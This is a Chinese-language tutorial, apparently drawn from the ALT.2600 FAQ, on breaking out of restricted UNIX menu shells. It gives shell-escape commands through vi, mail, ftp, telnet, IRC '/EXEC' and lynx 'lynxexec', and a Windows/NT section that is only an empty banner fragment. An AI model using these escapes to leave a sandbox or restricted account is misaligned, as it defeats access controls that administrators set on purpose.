如何突破一個有限制的SHELL
在菜單中得到SHELL用戶(UNIX)?
1.1有權使用 "vi" 程序(來自ALT.2600問題解答)
VI是一個強有力的文本編輯器,你可能有機會使用。你就有可能得到一個SHELL。
在VI狀態下輸入以下命令:
:shell=/bin/sh
然後再運行SHELL這個命令:
:shell
注釋: 如果你的SHELL被限制運行 " CD "命令,那麼請使用FTP來得到,這就可以了。
有權使用 "mail" 程序
如果你有權利使用 "mail" 程序來寫信請按照下面一步步做:
在菜單選項上運行"mail"程序。
實例:
1.Email (mail) <--------選擇這一項到
Email No mail for user1.....
(他會自動地返回選項菜單)
所以在此之前,你要寫一封信給你自己
1.Email (mail) <--------選擇這一項到
Email Mail version ?. Type ? for help.
"/var/spool/mail/user1": 1 messages
> 1
[email protected] Thu Sep 1 1:11 1/99 "test"
&
Ok,現在我們停留在 mail 的 "&" 提示符下,那麼現在只需要輸入以下命令:
&!/bin/sh[回車]
$ <------------ 終於不用再見到那該死的菜單了 ^_^
注釋: 許多程序裡字符 "!" 可以直接制定和運行一個 SHELL 命令,在合式的一個場合中 你可以運行 "/bin/sh" 去得到一個 shell。
FTP and Telnet FTP and Telnet 他們同樣有能力在提示符下運用字符 "!" 來執行命令:
ftp> !ps <-------- !(command)
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps
telnet>!ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps
在一些用戶的初始配置文件裡,並不會為你配置所有命令的絕對路徑,那麼當你要運行一個程序 時,如果你的配置文件裡路徑查找不到它將不會執行。這個時候你就要輸入這個程序的絕對路 徑了。
實例:
ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps
ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps
注釋:無論何時都要設法執行 !/bin/sh
注釋: WIN95/98 AND NT:
Microsoft Windows NT DOS
Copyright Microsoft Corp 1990-1996.
C:>
IRC
如果有限制的 SHELL 菜單裡可以運行執行 IRC client (Internet Relay Chat)
當在登錄的時候,你可以執行任何命令
/EXEC (command)
Lynx 可以使用以下命令 lynxexec and lynxprog:
實例:
lynxexec:ls -l
lynxprog:news
lynxexec:/bin/sh
實例: lynx lynxexec://localhost/finger